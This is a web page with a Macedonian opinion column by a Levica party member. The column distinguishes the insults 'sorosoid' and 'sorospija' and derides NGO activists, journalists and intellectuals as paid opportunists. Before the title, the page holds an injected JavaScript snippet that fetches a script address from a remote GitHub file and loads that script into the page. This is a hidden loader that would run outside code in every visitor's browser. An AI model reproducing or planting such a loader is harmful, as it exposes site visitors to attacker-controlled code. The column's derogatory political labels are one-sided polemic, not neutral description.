;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); За соросоидите и сороспиите - Антропол
АктуелноЛокално

За соросоидите и сороспиите

Ставовите изразени во оваа колумна не нужно се совпаѓаат со ставовите на редакцијата.


Мене ме обзема длабока огорченост поради нашите лажни хумани сфаќања и поради нашата длабока попустливост кон секој наш суров непријател. Ние сме глупаци, оти забораваме да се чуваме од нивните удари!

(Јакобинецот Жан Пол Мара – Пријателот на народот, XVIII век)

Моите другари левичари, неретко, добронамерно ми префрлаат дека не е баш умесно и политички коректно да го употребувам во јавност зборот „сороспија“. Демек, звучи доста навредливо и вмровски!? Ако добро се сеќавам, последен пат овој деликатен епитет му го упатив на еден малициозен, но „независен“ пратеник, ама од СДС(М), во телевизиската емисија Топ Тема на Телма. Притоа, забележав дека овие мои добронамерни критичари кои сè уште ги гаат илузиите дека она што преостана од промискуитетниот невладин сектор е некаков си природен сојузник на левицата – не ја прават суштинската разлика помеѓу термините „Сороспија“ и „Соросоид“, па во продолжение би сакал попластично да им ја разјаснам…

Соросоид е критизерски десничарски концепт

СОРОСОИД е десничарски концепт! Створен е во редовите на курирците од минатиот Режим, со цел да ги омаловажат сите обиди за напад против тогашната владејачка корумпирана гарнитура на Груевски и ДПМНЕ. Се употребува исклучиво во пежоративна и навредлива смисла, со сочните додавки од типот на: „предавници“, „петоколонаши“, „странски шпиони“, „кодоши“, „платеници“ и сл. Оттука, наликува на параноичните изјави на Виктор Орбан и други „демократски“ конзервативни популисти и авторитарни лидери, кои целат кон тотална десоросоизација на општеството, „чистење“ на сите јавни сфери од овој „социјален канцер“, како што милуваат го нарекуваат.

Морам да напоменам дека овој хистеричен тон на бркање соросоидни вештерки со пораки за нивно „палење на клада“ често ги исполнува критериумите на говор на омраза и, според тоа, треба соодветно да биде санкциониран и игнориран во јавниот дискурс, како мошне штетен, навредлив и недопустлив за современа аргументирана дебата и цивилизиран политички дијалог.

Сороспија е критички левичарски концепт

Но, за разлика од соросоидот, СОРОСПИЈА е левичарски концепт! Него го измислија прочуените Ленкаши, кои, без конкуренција, се најомразените во круговите на Сорос-кликата. Се случи тоа на едно познато годишно собрание на Движењето за социјална правда „Ленка“, кое се одржа во култниот АКСЦ – Автономниот културно-социјален центар, кој до пред неколку години работеше во Скопје. Во моментите на пауза, еден другар од Куманово, гледајќи на својот фејсбук профил, на шала дофрли дека некој познат „сороспија“ повторно јадел гурабии против некој активист на Ленка. Во просторијата завладеа општо задоволство од проникливоста на новосклопениот термин, кој така суптилно ја одразуваше карактерната особина на најголем број од спонзорушите на контроверзната фондација „Отворено општество – Македонија“. И така, оттогаш терминот сороспија влезе во аналите на левичарското движење во Македонија, како интелигентен и автентичен левичарски одговор на постојаните шиканирања и спинерски оркестрирани напади упатувани кон левичарските активисти кои беа против СДС(М), односно кои уште тогаш беа за создавање на вистинска левичарска партија на македонскиот политички простор, која подоцна и се оствари преку создавањето на партијата Левица.

За разлика од пропагандистичкиот термин соросоид, терминот сороспија има свој длабински политички супстрат, па оттука може и научно да се опсервира и емпириски да се докаже – историски, социолошки, политолошки, правнички, економски, па ако сакате и лукративно-сметководствено. Како што луцидно наведува еден друг мој другар од левичарските редови, инаку иден магистер по политички науки, основната карактеристика на личноста на кого се однесува овој поим е политичката релативност, односно безидеологичноста и недоследноста во политизирањето на својата философија. Потоа, сороспијата особено е познат/а по тоа што неговиот/нејзиниот општествен активизам е по принципот на реципроцитет со материјалниот личен бенефит (т.н. платен активизам).

Една постудиозна индуктивно-дедуктивна анализа ни покажува дека сороспиите, како генерички вид инкорпориран во низа различни општествени т.н. угледни професии – уредници, новинари, невладини активисти, борци за човекови права, синдикалци, владини чиновници, бирократи, бизнисмени, професори, естрадни уметници, „експерти“ од секакви области, кои се на располагање 24/7 за секакви можни дебатни емисии и сл. – и покрај нивната шареноликост, сепак, ги има само во два основни подвида. Притоа, само попатно, би сакал да предупредам дека, за лаиците, ваквата диференцијација на различните повидови сороспии само навидум е многу тешка, пред сè поради втората нивна препознатлива одлика – позитивистичката бесконтекстност на нивните дејствија и јавни настапи.

Сороспија за себе  vs.  Сороспија по себе

Значи, како што потенциравме, и покрај потешкотиите за распознавање на различните подвидови сороспии – сепак, базично, можат да се препознаат два главни подвида:

а) Првиот подвид е „сороспијата сам за себе“, односно т.н. сороспија од повисок ред.  Овој специфичен подвид на сороспии се потполно свесни за нивната лична корист од статус-кво ситуацијата во Македонија (двопартискиот систем на „Курто и Мурто“), па претставуваат реален фактор во општествените неслучувања, односно нивниот активизам е правопропорционален со големината на цифрите на нивните банкарски трансакциски сметки. Тие, најчесто, се советници на естаблишментот и своите погубни неолибералистички политики ги туркаат од позадина, а само по потреба се вклучуваат како своевидни „тешкаши“, кога нивните следбеници нема баш најдобро да си ја завршат задачата за која се [пре]платени.

б) Вториот подвид на сороспија е „сороспијата сам по себе“, т.е. сороспија од понизок ред. Наспроти првиот подвид, сороспиите по себе, како категорија sui generis, објективно постојат, но без субјективна свест за општествените случувања. Карактерот на вториов повид сороспии е определен од објективната положба во политичкиот простор на првиот [супер]вид сороспии, и најчесто е механички одраз на истиот. Тажното кај вториов вид сороспии е тоа што тие се воодушевуваат од самото блажено постоење на сороспиите од повисок ред, па кога ќе пораснат сакаат да станат како нив. Впрочем, тие се само гола амбиција, најчесто без кредибилно и доблесно покритие.

Чудно е тоа што голем дел од првиот подвид сороспии себеси се перцепираат како ликови кои имаат идеологија „лево од центарот“!? Но, историјата веќе се има пошегувано со овој опортунистички џган и ги има натерано опортунистите од една земја да ги антиципираат опортунистите од другите земји. Овие шарени револуционери на фразата, кои на трибините б’здат со својата речитост, всушност, се робови на предрасудите на ситнобуржујската демократија и измеќари на неолиберализмот. Ситнодушните начитани буржуи, разочарани од лагите на капитализмот, лесно поминуваат во наводна крајна револуционерност, но се неспособни да пројават карактер, владеење со себе, организираност, дисциплина и упорност во борбата! Непостојаноста на таквата „револуционерност“, нејзината бесплодност, својството брзо да се претвора во покорност, компромисиерство, апатија, фантастика, па дури и во бесен занес по оваа или онаа помодарска струја – сето ова се чини дека е општопознато, како што е општопознато дека три е поголемо од два!

Но политиката, драги мои вазали, повеќе прилега на алгебра, одошто на аритметика и уште повеќе на виша математика, одошто на нижа. Всушност, денес, во услови на перфиден натовски притисок за промена на уставното име на Републиката, во услови на килава и поданичка Влада со слаби министерски потенцијали, сите стари форми на активистичко движење на отпорот, полека но сигурно се мобилизираат и се полнат со нова содржина и свежа енергија. Па, затоа, и пред цифрите на геополитичките математичари се појавува нов знак – „минус“. И верувајте ми дека токму овој знак ќе им ја расипе сметката на нашите властодршци кои го потценуваат народот и го злоупотребуваат неговото трпение. А некои наши кутри мудреци и интелектуални сороспии, упорно продолжуваат да се уверуваат, и себеси и другите, дека минус три е поголемо од минус два.

Димитар Апасиев, универзитетски професор и член на президиумот на Левица